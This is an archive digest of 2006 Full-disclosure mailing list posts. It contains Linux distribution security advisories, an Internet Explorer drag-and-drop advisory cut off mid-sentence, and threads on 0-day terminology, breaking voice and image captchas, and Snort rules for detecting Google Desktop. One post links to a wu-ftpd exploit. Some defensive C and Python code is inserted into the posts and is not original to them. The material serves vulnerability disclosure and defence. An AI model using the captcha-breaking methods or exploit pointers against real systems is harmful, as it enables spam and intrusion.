Re: [Full-disclosure] On the "0-day" term

2006-02-13 Thread Jason Coombs

Steven M. Christey wrote:

> One would hope that there is some critical mass (i.e. number of
> compromised systems) beyond which any in-the-wild 0-day would become
> publicly known.


We can't presume that all 0-day exploits will end up being widely 
observed and thus become well-known. This is not a valid presumption 
even if it ends up being true in practice, today.


The real challenge is for incident response forensics staff to equip 
themselves ahead of time with the necessary tools (and sources of 
forensic logs, including, for example, full packet capture logs of all 
network traffic within a rolling window time period that is as lengthy 
as possible) to be able to identify a 0-day exploit used as the source 
of entry for a one-off intrusion event.


Being able to detect, reliably, any changes made to configuration 
settings or on-disk and in-memory binaries altered by the intruder is 
good, too, but the capability to ascertain precisely what vulnerability 
got exploited to gain entry in the first place is critical to keeping 
the same well-prepared intruder out the second time around.


Some of the technical barriers to achieving full forensic awareness 
within the time period during which a relevant 0-day event occurred 
include the use of SSL and other encryption which bypasses simple packet 
capture logging (unless one's SSL engine also logs all session keys 
generated) and the processing power and storage space required to 
capture, store, and analyze such a large quantity of real-time and 
historical data. Not to mention the questionable probability that the 
log windows will be wide enough to contain useful information when an 
intrusion is finally noticed.


Dramatic improvements in this area of computer and network forensics 
would fundamentally alter modern information security. I do not see how 
any organization can believe itself to be adequately secured when the 
simple ability to prove security measures are working, and quickly 
determine the precise method of failure when they break down, 
essentially does not exist today.


Sincerely,

Jason Coombs
[EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Internet Explorer drag&drop 0day

2006-02-13 Thread Markus

Hi Thierry Zoller,

I have a couple of problems/questions regarding your web-site:
On the Secure-It details page [ http://www.sniff-em.com/secureit.shtml ]
under the heading  "Do you have a demonstration ?", both links to the
demo "exploit" are dead.
   [ http://www.freewebs.com/shreddersub7/htm.htm ]
   [ http://www.freewebs.com/shreddersub7/htm.htm%20 ]

My primary concern, however, is the method chosen to open those links.
I assume that, in an attempt to hide the target URL, you meant to use the
* onclick * javascript event, or even * onmousedown * or * onmouseup *,
but surely not * onmouseover *!

You are aware that your currently chosen method would have launched your
exploit on the machine of a prospective customer, without so much as a
click's worth of their consent, had the links worked and by some small
miracle they had disabled pop-up blocking etc.

I do wish you the best of luck in your ventures.
Your products appear both useful and interesting.
Please give your web designer a whack on the side of the head though.

Regards
Markus


Gadi Evron wrote:

> > Dear Gadi Evron,
> >
> > Just a note Users of Secure-it were already protected against this as
> > it blocks the shell.explorer interface since 2005:
> >
> > http://www.sniff-em.com  [Freeware]
>
> Cool. Thanks. That's the most polite and non-evasive commercial plug-in
> I've seen in a while! :)
>
> I mean that!


[Full-disclosure] On the "0-day" term

2006-02-13 Thread Steven M. Christey

In the "Internet Explorer drag&drop 0day" thread, Gadi Evron said:

>In my opinion, this comes to prove 0days are USUALLY a "myth" (WMF
>being a good example of a real 0day),

It's not necessarily that 0-days are a myth, it's that people have
been using the term "0-day" to mean two separate things:

 - in-the-wild hacks of live systems using vulnerabilities previously
   unknown to the public and the vendor;

 - release of exploit information for vulnerabilities previously
   unknown to the public and the vendor, for which there are no known
   in-the-wild hacks of live systems at the time of disclosure (though
   such hacks seem to occur very soon afterward)


>Does anyone still think bad guys don't exploit (to whatever goals) a
>0day if it is out there?

The answer seems obvious, but...

It's not entirely clear to me how many in-the-wild 0-days exist and
are actively exploited.  Just because some "white hat" finds something
does not mean that we should ALWAYS assume that the "black hats"
already know about it.  The converse is also true, of course; see the
recent WMF issue.

Certainly, at least a couple in-the-wild 0-days are publicized a year,
and maybe more in the coming year, given the precedents of the past 6
months or so, as the honeymonkeys project and Websense have shown.

One would hope that there is some critical mass (i.e. number of
compromised systems) beyond which any in-the-wild 0-day would become
publicly known.  This critical mass would depend on the diligence of
the incident response community and the amount of coordination -
direct or indirect - with the vulnerability research community.

- Steve


[Full-disclosure] [SECURITY] [DSA 970-1] New kronolith packages fix cross-site scripting

2006-02-13 Thread Martin Schulze

--------------------------------------------------------------------------
Debian Security Advisory DSA 970-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
February 14th, 2006                     http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: kronolith
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2005-4189
Debian Bugs: 342943 349261

Johannes Greil of SEC Consult discovered several cross-site scripting
vulnerabilities in kronolith, the Horde calendar application.

The old stable distribution (woody) does not contain kronolith packages.

For the stable distribution (sarge) these problems have been fixed in
version 1.1.4-2sarge1.

For the unstable distribution (sid) these problems have been fixed in
version 2.0.6-1 of kronolith2.

We recommend that you upgrade your kronolith and kronolith2 packages.


Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1.dsc
      Size/MD5 checksum:      581 246f510d44a3a79fe88d9b6f0efc0cda
    http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1.diff.gz
      Size/MD5 checksum:    12005 c10a7d82b97300d62e6ef45f6e5e3cfe
    http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4.orig.tar.gz
      Size/MD5 checksum:   530945 8f5e5bca2a8b383e8a00fe19dacd138f

  Architecture independent components:

    http://security.debian.org/pool/updates/main/k/kronolith/kronolith_1.1.4-2sarge1_all.deb
      Size/MD5 checksum:   528516 4d4ed7e51485ca96008175597612d72a


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/




[Full-disclosure] [ MDKSA-2006:039 ] - Updated gnutls packages fix libtasn1 out-of-bounds access vulnerabilities

2006-02-13 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:039
 http://www.mandriva.com/security/
 ___
 
 Package : gnutls
 Date: February 13, 2006
 Affected: 10.1, 10.2, 2006.0
 ___
 
 Problem Description:
 
 Evgeny Legerov discovered cases of possible out-of-bounds access
 in the DER decoding schemes of libtasn1, when provided with invalid
 input.  This library is bundled with gnutls.
 
 The provided packages have been patched to correct these issues.
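The defensive check this bug class calls for, as an added example that is not libtasn1's or Mandriva's code: a DER tag/length header parser in C that validates every read against the bytes actually available, so a declared length larger than the input is rejected rather than read past the end of the buffer. The names (`der_hdr`, `der_read_header`) and the sample encodings are constructed for this illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Decoded DER tag/length header. Example code added here; it is not
 * libtasn1's decoder, only an illustration of the bounds checks a DER
 * length parser needs so that invalid input cannot drive reads past the
 * end of the buffer. */
typedef struct {
    int ok;          /* 1 if the header is valid DER and the content fits in `avail` bytes */
    uint8_t tag;     /* identifier octet */
    size_t hdr_len;  /* octets consumed by tag + length */
    size_t len;      /* declared content length */
} der_hdr;

der_hdr der_read_header(const uint8_t *buf, size_t avail)
{
    der_hdr h = {0, 0, 0, 0};
    size_t i = 0;

    if (avail < 2)                        /* need at least tag + first length octet */
        return h;
    h.tag = buf[i++];
    if ((h.tag & 0x1f) == 0x1f)           /* high-tag-number form: rejected here for brevity (assumption) */
        return h;

    uint8_t first = buf[i++];
    if (first < 0x80) {
        h.len = first;                    /* short form: the octet is the length */
    } else {
        size_t n = first & 0x7f;          /* long form: number of following length octets */
        if (n == 0 || n > sizeof(size_t)) /* 0x80 = indefinite form (not DER); > 8 octets cannot be real */
            return h;
        if (n > avail - i)                /* the length octets themselves would run off the buffer: */
            return h;                     /* this is the read an unchecked decoder performs out of bounds */
        if (buf[i] == 0)                  /* leading zero octet: non-minimal, not DER */
            return h;
        size_t len = 0;
        for (size_t k = 0; k < n; k++)
            len = (len << 8) | buf[i++];
        if (len < 0x80)                   /* should have used the short form: non-minimal, not DER */
            return h;
        h.len = len;
    }
    h.hdr_len = i;

    if (h.len > avail - i)                /* declared content longer than what is actually present */
        return h;
    h.ok = 1;
    return h;
}

/* Constructed sample encodings for the checks below. */
static const uint8_t der_ok_short[]  = { 0x30, 0x03, 0x02, 0x01, 0x05 };    /* SEQUENCE { INTEGER 5 } */
static const uint8_t der_overlong[]  = { 0x04, 0x82, 0x01, 0x00, 0x41 };    /* OCTET STRING claims 256 bytes, 1 present */
static const uint8_t der_truncated[] = { 0x04, 0x84 };                      /* says 4 length octets follow, none do */
static const uint8_t der_nonmin[]    = { 0x04, 0x81, 0x05, 1, 2, 3, 4, 5 }; /* long form for 5: not DER */

/* Valid long-form case: OCTET STRING of exactly 128 bytes (0x81 0x80). */
int der_long_form_demo(void)
{
    uint8_t buf[131] = { 0x04, 0x81, 0x80 };   /* remaining 128 bytes are zero content */
    der_hdr h = der_read_header(buf, sizeof buf);
    return h.ok && h.hdr_len == 3 && h.len == 128;
}
```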
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0645
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Re: [Full-disclosure] Latest wu-ftpd exploit :-s

2006-02-13 Thread John Smith

You're about 2 years too late.

Mark Heiligen wrote:

> http://www.frsirt.com/exploits/08.11.0x82-wu262-advanced.c.php


[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)

2006-02-13 Thread Matthew Murphy

My apologies to those who are receiving this late or are otherwise
inconvenienced by the staggered release.  I had unexpected, last-minute
travel issues that interfered somewhat with today's release.

Of note since the initial drafting of the advisory is that Microsoft has
released a blog post on the MSRC blog about the vulnerability report,
which can be read here:

http://blogs.technet.com/msrc/archive/2006/02/13/419439.aspx

The technical/strategic points about the exploit that are raised in the
post are indeed accurate (though it references MS05-014, when I believe
the correct reference is MS05-008/MS05-013).  The exploit has a greater
dependence on timing than previous, related attacks.  As such,
Microsoft's decision not to include this issue in a standalone patch is
seemingly justified at this point.  However, the point of disagreement
with Microsoft remains the choice of release *timeline*.

I released the information about this issue to a trusted colleague (Gadi
Evron) for publication today, after what I felt was a reasonable time,
in light of my difficulties obtaining internet access.

Though there are disagreements between myself and Microsoft about the
nature of this vulnerability, I would like to thank Brian Schafer of the
MSRC for adhering to a high level of professionalism and technical
accuracy in that post and for continuing to work with me once it was
made clear that the issue would imminently become public.

Also of note is that there was a typo in the information I provided
originally to SecuriTeam.  The proper candidate is CVE-2005-3240, not
*3840* as was originally reported by me.  SecurityFocus has also
informed me that my original BID reservation was a casualty of a data
migration and that the proper BID associated with this vulnerability is
now BID 16352, which is public in full detail as of this writing.

There have also been some incorrect reports made to SecuriTeam that this
issue does not affect Windows XP Service Pack 2.  These reports are not
correct -- my testing during this investigation was done exclusively on
current installations of Windows 2000 and Windows XP.  These systems had
all service packs applied and all updates installed when tests were
performed.

Thanks to Gadi Evron for doing some of my bidding today and taking some
of the heat for my fat-fingers.

The final advisory, corrected with the now-accurate references is
attached with an armored-format PGP signature inline.

- --
"Social Darwinism: Try to make something idiot-proof,
nature will provide you with a better idiot."

-- Michael Holstein

Microsoft Internet Explorer Drag-and-Drop Redeux

I. SYNOPSIS

Affected Systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
- Windows 98
- Windows 98 Second Edition
- Windows Millennium Edition
- Windows 2000
- Windows XP
- Windows Server 2003

Risk: Medium
Impact: Potential remote code execution with some user interaction
Status: Uncoordinated Release
Author: Matthew Murphy ([EMAIL PROTECTED])

II. VULNERABILITY OVERVIEW

Microsoft Internet Explorer suffers from a vulnerability in its handling of 
certain drag-and-drop events.  As a result, it is possible for a malicious web 
site to predict and exploit the timing of a drag-and-drop operation such that 
any drag operation (including using scroll-bars) could potentially lead to the 
installation of arbitrary files in sensitive locations that may enable further 
system compromise.

III. TECHNICAL DESCRIPTION

As a result of recent updates to its drag-and-drop functionality, Internet 
Explorer now imposes a rigid set of restrictions on most drag-and-drop sources:

* Input to the browser from other applications is not permitted.
* Dragging an object from inside a frame is not permitted.
* Dragging an HTML element from a top-level window will produce a 
security warning.

However, certain objects not derived from an HTML document (specifically, file 
objects within a folder view) remain draggable.  This gives rise to a potential 
race condition in the handling of user input.  If an attacker can persuade a 
user to drag any object within the top-level window that his/her site is 
contained in, malicious script can redirect these inputs to other top-level 
windows, potentially resulting in an unintended consequence such as file 
installation.

Proof-of-concept code has been developed that utilizes a pop-under window 
pointing to a malicious file share.  This window can be created using 
window.


[Full-disclosure] defeating voice captchas

2006-02-13 Thread Gadi Evron
One of the newest (now known though) tricks in the Captcha book is using 
Voice.


If users cannot understand what the letters are in the now too-complex 
Captchas that are forced on us due to spammer counter-measures at 
defeating Captchas, he or she can click on an icon and listen to it. :)


Here is the earliest example of it that I know of:
http://www.notonebit.com/projects/killbot/kbaudio.php

That example is a bit amateurish, as the recording is bad and obviously 
not done by a girl with a sexy voice. Still, the disturbance from the 
bad Microphone can be eliminated or kept entirely. It doesn’t matter.


In this case each letter is played by itself. Further, each letter was 
recorded only once.


Therefore, how many times does one have to refresh the page and listen 
to the Captcha to be able to simply learn to identify the Captcha by 
say, an MD5 hash of the audio for each letter?


Even if it was all set in one audio file, and even if the audio was 
played with to be, as an example, in a higher pitch. Or perhaps even if 
several different voices would greet us…
Looking at general similarities in the audio file itself would be enough 
to break down this Captcha once enough harvesting attempts (not that 
many really) were saved.


Auto-generated voice? That sounds easy to beat but I am not an audio 
expert so, “sounds like” will stay as my opinion.


It's great to be able to finally understand these new annoying 
Captchas, but already we are getting to a point where one can’t 
understand the recorded speech either due to counter-measures from the 
spammers and the Captchas becoming more and more difficult.


For information on breaking regular text-image Captchas, check:
http://en.wikipedia.org/wiki/Captcha
http://blogs.securiteam.com/index.php/archives/208

For my post on new comment spam problems:
http://blogs.securiteam.com/index.php/archives/285

This text can be found here:
http://blogs.securiteam.com/index.php/archives/287

Gadi.


[Full-disclosure] [ GLSA 200602-06 ] ImageMagick: Format string vulnerability

2006-02-13 Thread Thierry Carrez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200602-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ImageMagick: Format string vulnerability
  Date: February 13, 2006
  Bugs: #83542
ID: 200602-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability in ImageMagick allows attackers to crash the
application and potentially execute arbitrary code.

Background
==========

ImageMagick is an application suite to manipulate and convert images.
It is often used as a utility backend by web applications like forums,
content management systems or picture galleries.

Affected packages
=================

    -------------------------------------------------------------------
     Package                        /  Vulnerable  /       Unaffected
    -------------------------------------------------------------------
  1  media-gfx/imagemagick              < 6.2.5.5           >= 6.2.5.5

Description
===========

The SetImageInfo function was found vulnerable to a format string
mishandling. Daniel Kobras discovered that the handling of "%"-escaped
sequences in filenames passed to the function is inadequate. This is a
new vulnerability that is not addressed by GLSA 200503-11.
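An added example, not ImageMagick's own code: the hardened way to handle a filename that may legitimately carry a scene-number specifier (such as `frame%03d.png`) without ever using the user-supplied string as a printf format. The function names and the three-digit width limit are assumptions of this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Example code added here; these are not ImageMagick functions.
 * ImageMagick lets a filename carry a scene-number specifier such as
 * "frame%03d.png". Passing the whole user-supplied filename to the
 * formatter as its format string is the bug class this advisory
 * describes; the fix is to accept only the intended specifier and to
 * expand it with a fixed, literal format string. */

/* Returns 1 if every '%' in tmpl starts either "%%" or "%<width>d"
 * (width at most 3 digits, an assumption), 0 for any other conversion. */
int scene_template_is_safe(const char *tmpl)
{
    for (const char *p = tmpl; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                     /* literal percent sign */
            continue;
        int digits = 0;
        while (*p >= '0' && *p <= '9') {   /* optional zero-padded width */
            p++;
            digits++;
        }
        if (digits > 3 || *p != 'd')       /* %s, %x, a trailing '%', ... are all rejected */
            return 0;
    }
    return 1;
}

/* Expand the scene number into a validated template. The format string
 * handed to snprintf is a fixed literal; the template is only copied.
 * Returns 1 on success, 0 if the template is unsafe or out is too small. */
int expand_scene_filename(const char *tmpl, unsigned scene, char *out, size_t outsz)
{
    if (outsz == 0 || !scene_template_is_safe(tmpl))
        return 0;
    size_t o = 0;
    for (const char *p = tmpl; *p; p++) {
        if (*p != '%') {
            if (o + 1 >= outsz) return 0;
            out[o++] = *p;
            continue;
        }
        p++;
        if (*p == '%') {
            if (o + 1 >= outsz) return 0;
            out[o++] = '%';
            continue;
        }
        int width = 0;
        while (*p >= '0' && *p <= '9')
            width = width * 10 + (*p++ - '0');
        /* *p is 'd' here: the validator guarantees it */
        int n = snprintf(out + o, outsz - o, "%0*u", width, scene);
        if (n < 0 || (size_t)n >= outsz - o)
            return 0;
        o += (size_t)n;
    }
    out[o] = '\0';
    return 1;
}

/* Convenience wrapper for trying templates; returns NULL when rejected. */
const char *expand_demo(const char *tmpl, unsigned scene)
{
    static char buf[64];
    return expand_scene_filename(tmpl, scene, buf, sizeof buf) ? buf : NULL;
}
```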

Impact
======

By feeding specially crafted file names to ImageMagick, an attacker can
crash the program and possibly execute arbitrary code with the
privileges of the user running ImageMagick.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ImageMagick users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/imagemagick-6.2.5.5"

References
==========

  [ 1 ] CVE-2006-0082
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0082
  [ 2 ] GLSA 200503-11
http://www.gentoo.org/security/en/glsa/glsa-200503-11.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200602-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0




RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread php0t
> http://en.wikipedia.org/wiki/Captcha#Defeating_Captchas
> might be a good place to start.  pwntcha is supposedly quite
> successful.

  Thanks for the tip. Shame on me for not clicking the Wikipedia link
last time.
I will comment on the links I found worthwhile.

1) http://www.puremango.co.uk/cm_breaking_captcha_115.php
Different subject: it explains how to defeat poor implementations of it
that don't get rid of the session.

2) http://www.puremango.co.uk/acdc_breakcaptcha.php
Gonna look into it, seems promising in the aspect of letting me supply
an image of my choice.

3) http://web.archive.org/web/20050329185234/http://sam.zoy.org/pwntcha/
(quote) "Q. Please give me a copy of PWNtcha so that I can test it on my
own CAPTCHA and see how efficient it is! 
A. PWNtcha does not work that way. It is not an intelligent program that
tries to decode a random CAPTCHA. Such a program would be nearly
impossible to do. PWNtcha is simply a toolkit of image manipulation
functions, and a list of known CAPTCHAs with the associated list of
image operations to apply in order to decode each of them. If I have
never seen your CAPTCHA, then PWNtcha does not know about it, and there
is absolutely no way it could decode it."


  I've been saying from the start that I'm aware of the fact that there
are *some* programs that can defeat *some* captchas, just like this one.
Also, it doesn't offer what (2) did, probably because of the quote
above.
  Still, it's a page that is quite useful: it explains the weaknesses of
the certain implementations.
  I guess we can all learn from all these, some examples:

1) destroy the session when not needed any more
2) change the picture on a wrong attempt
3) take measures against 'brute force'
4) don't use constant parts (font, background, colors)
5) use rotation, deformation, maybe letters in 3D (adding extra edges
;])
6) layer more words on each other
7) if you sense too much spam, change a few things
etc
etc
etc
  I probably left out a lot of things that should be considered, so
additional ideas are very welcome.

php0t



Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Michael Holstein
> I am using Google desktop version 4. By default search across computers 
> is not enabled. Can someone explain me why all the noise if I just don't 
> use the feature.


True, it's not enabled by default, but Google is pitching this as an 
easy way to access your work documents from home (or vice versa) .. and 
*that* is a serious security risk.


In the corporate world, users don't get to make their own choices. 
Management makes them, and it's the IT department's job to enforce that 
-- against the user's will kicking and screaming, if necessary.


~Mike.


Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Valdis . Kletnieks
On Mon, 13 Feb 2006 23:38:41 +0530, Prabhat Sharma said:

> I am using Google desktop version 4. By default search across computers is
> not enabled. Can someone explain me why all the noise if I just don't use
> the feature.

The noise is because many of us have dozens, or hundreds, or thousands of
users we're responsible for, who *will* enable it because it looks cool, not
realizing the security implications.  A significant fraction will enable it
Just Because, even though they then never actually *use* the functionality



Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Prabhat Sharma
I am using Google desktop version 4. By default search across computers is
not enabled. Can someone explain to me why all the noise if I just don't use
the feature.

I believe that educating the users is the best way to safeguard against
issues like this. As my understanding says, most of the incidents take
place not because of technical superiority of the attacker (virus) (it
applies to issues like GDS as well) but because of social engineering or
insufficient due diligence on the user's part.

PS: No offense to anyone. If what I am thinking is wrong kindly correct me.

Re: [Full-disclosure] blocking Google Desktop

2006-02-13 Thread Michael Holstein
First, I made a mistake in the version number. The current/new one is 
version 3 (the one that uploads your data to Google)


I've been experimenting with Snort sigs to detect this.

Google Desktop uses a unique user-agent (I got a tip about this from 
another user at full-disclosure -- thanks Charles!) :


User-Agent: Mozilla/4.0 (compatible; Google Desktop)

So here is a snort sig for that ...

alert tcp $HOME_NET any -> $EXTERNAL_NET 80 (msg: "BLEEDING-EDGE Google Desktop User-Agent Detected"; flow: to_server,established; content:"User-Agent\: Mozilla/4.0 (compatible\; Google Desktop)"; nocase; classtype: policy-violation; sid: 301; rev:1; )


That sig would at least let you know who's using it, but blocking that 
traffic wouldn't do anything except prevent the RSS feeds (news, 
weather, etc) from loading.


Now, for the file-specific stuff, since that's all done over SSL to 
google.com :


Upon examining the SSL/TLS session setup, I wrote this one to flag the 
certificate Google is using (from Thawte). This will probably change 
when they change/renew their certificates.

alert tcp $EXTERNAL_NET 443 -> $HOME_NET 1024:65535 (msg: "BLEEDING-EDGE Google SSL key exchange"; flow: from_server,established; content:"|30 36 30 36 30 37 32 32 31 32 35 34 5A 30 68 31|"; rawbytes; content:"|77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D|"; rawbytes; classtype:policy-violation; sid: 302; rev:1; )


Note that this also flags logons to gmail.

The fetches with the "Google Desktop" user-agent happen first when the 
application is started -- then you get the SSL setup for any new data to 
be uploaded to Google's servers.


Unfortunately, the dynamic/activate stuff in snort doesn't let you do an 
"alert" action after an activate -- because it's designed to just dump 
the next (n) packets. If there was a good way to chain the two rules 
together -- to say "after seeing 1, do REACT on #2" -- you could reliably 
kill any SSL/TLS sessions from somebody running Google Desktop, thus 
preventing the upload of anything.


Thoughts?

Michael Holstein CISSP GCIA
Cleveland State University
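
As an added illustration (not Michael's code and not part of Snort), here is a small Python matcher that implements just enough of Snort's content: semantics (the |hex| sections, the backslash escapes and nocase) to run his two rules over constructed traffic, and adds the per-host chaining he asks for at the end: an SSL handshake from a host that has already sent the Google Desktop User-Agent is reported as a separate, higher-confidence event. The packets, the addresses (192.0.2.80 for the server, 10.0.0.x for clients) and the certificate bytes are all constructed for the demo; the Gmail packet reproduces the false positive he notes, and the chained alert shows why the User-Agent rule is the better pivot.

```python
from collections import namedtuple

# A packet as the matcher sees it: addresses, ports and the raw payload.
Packet = namedtuple("Packet", "src sport dst dport payload")


def parse_snort_content(pattern):
    """Translate a Snort content: string into the bytes it matches.

    Text between '|' characters is a hex dump (spaces allowed); outside
    it, a backslash escapes the next character, which is how Snort
    writes ':' ';' '"' and '\\' inside content strings.
    """
    if pattern.count("|") % 2:
        raise ValueError("unbalanced '|' in content pattern")
    out = bytearray()
    for i, part in enumerate(pattern.split("|")):
        if i % 2:                        # odd parts are inside |...|
            out += bytes.fromhex(part)
            continue
        j = 0
        while j < len(part):
            if part[j] == "\\" and j + 1 < len(part):
                j += 1                   # drop the escape, keep the char
            out.append(ord(part[j]))
            j += 1
    return bytes(out)


class Rule:
    """One rule: every content pattern must appear in the payload and the
    packet must flow in the rule's direction (to_server or from_server)."""

    def __init__(self, sid, msg, server_port, to_server, contents, nocase=False):
        self.sid, self.msg, self.nocase = sid, msg, nocase
        self.server_port, self.to_server = server_port, to_server
        self.contents = [parse_snort_content(c) for c in contents]

    def client_of(self, pkt):
        """Client IP if the packet flows in this rule's direction, else None."""
        if self.to_server and pkt.dport == self.server_port:
            return pkt.src
        if not self.to_server and pkt.sport == self.server_port:
            return pkt.dst
        return None

    def matches(self, pkt):
        hay = pkt.payload.lower() if self.nocase else pkt.payload
        return all((c.lower() if self.nocase else c) in hay for c in self.contents)


# The two rules from the post, transcribed option by option.
RULES = [
    Rule(301, "BLEEDING-EDGE Google Desktop User-Agent Detected", 80, True,
         [r"User-Agent\: Mozilla/4.0 (compatible\; Google Desktop)"], nocase=True),
    Rule(302, "BLEEDING-EDGE Google SSL key exchange", 443, False,
         ["|30 36 30 36 30 37 32 32 31 32 35 34 5A 30 68 31|",
          "|77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D|"]),
]


def correlate(packets, rules=RULES):
    """Run the rules over packets in order and return (sid, client, msg)
    alerts. A synthetic sid 303 is raised when sid 302 fires for a client
    that already tripped sid 301: the 'after seeing 1, act on 2' chain."""
    alerts, ua_hosts = [], set()
    for pkt in packets:
        for rule in rules:
            client = rule.client_of(pkt)
            if client is None or not rule.matches(pkt):
                continue
            alerts.append((rule.sid, client, rule.msg))
            if rule.sid == 301:
                ua_hosts.add(client)
            elif rule.sid == 302 and client in ua_hosts:
                alerts.append((303, client, "Google Desktop host opening SSL session"))
    return alerts


# Constructed sample traffic, not a capture. The 'certificate' bytes only
# embed what rule 302 looks for: a validity UTCTime 060607221254Z (the
# 30 36 ... 5A bytes) followed by 30 68 31, and the string www.google.com.
SERVER = "192.0.2.80"
GDS_REQUEST = (b"GET /rss HTTP/1.1\r\nHost: desktop.google.com\r\n"
               b"User-Agent: Mozilla/4.0 (compatible; Google Desktop)\r\n\r\n")
FIREFOX_REQUEST = (b"GET / HTTP/1.1\r\nHost: www.google.com\r\n"
                   b"User-Agent: Mozilla/5.0 (Windows; rv:1.8) Gecko/20051111 Firefox/1.5\r\n\r\n")
GOOGLE_CERT = (b"\x16\x03\x01\x0b" + b"\x00" * 6 + b"060607221254Z0h1"
               + b"\x0b0\t\x06\x03U\x04\x06\x13\x02US" + b"www.google.com")
OTHER_CERT = b"\x16\x03\x01" + b"051231235959Z0a1" + b"www.example.com"

SAMPLE_PACKETS = [
    Packet("10.0.0.5", 3305, SERVER, 80, GDS_REQUEST),      # GDS fetches its feeds
    Packet(SERVER, 443, "10.0.0.5", 3306, GOOGLE_CERT),     # then opens SSL to Google
    Packet(SERVER, 443, "10.0.0.7", 1187, GOOGLE_CERT),     # a plain Gmail login
    Packet("10.0.0.7", 1188, SERVER, 80, FIREFOX_REQUEST),  # ordinary browsing
    Packet("10.0.0.9", 2001, SERVER, 443, OTHER_CERT),      # client->server, not matched
]

if __name__ == "__main__":
    for sid, client, msg in correlate(SAMPLE_PACKETS):
        print("sid %d  %-10s %s" % (sid, client, msg))
```

The correlation keeps state per client IP only; in practice the set would need expiry, and the 303 event is the one worth acting on (or feeding to a host-based block), since the 302 rule alone fires on any Google SSL session and stops matching at the next certificate renewal.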


RE: [Full-disclosure] Comment Spam: new trends, failing counter-measures and why it's a big deal

2006-02-13 Thread php0t
> > the global solution against word recognition based challenges? If it
> > was like that, it would mean that there is no way anybody could make
> > an image generator that would change its success rate from 90% to
> > 0%...

> It's *really* *really* difficult to produce a graphic image of letters
> and numbers that is still recognizable to a human but can't
> be beaten by a good edge-detection algorithm.  For instance, you can
> "bleed" the edges so that they're fuzzy - but then the
> human has a hard time telling if it's an 'i' or an 'l', or an 'h' or a
> 'b' (and so on).


  This is kind of like the problem that you have when you get a
confirmation code in SMS, and you can't tell between I's and l's etc
thanks to your mobile phone's display. But that doesn't mean the problem
is about verifying the person via SMS. They just need to filter / change
some letters used to make it a little more obvious (and maybe balance it
with longer strings).

What you're saying sounds nice, but I ask again - both of you - to post
some links to some of these high success rate AI bots (preferably php's)
with that algo you say is hard to beat.

  I'm certainly interested in this, because all this time I thought that
even if there were *some* applications that could defeat *some*
challenges, the Turing test was still up to the current times, but what
you're telling me totally contradicts that.
Since you both mentioned these things as certain existing facts, it
would be nice to get a reference to a URL (preferably more) so people
could just look at it (them) and try for themselves (and naturally play
around with them until they beat it - you say it's *very very* hard, I
say I have yet to see it - even if it's hard, it'd be worth my time to
experiment with it, others will probably agree who think this subject is
interesting). Yes, I googled, I didn't get 


> I suppose you *could* put up a picture of something, and ask "What is
> this a picture of" - but then you need a sufficiently
> large library of images that an attacker can't just download all of
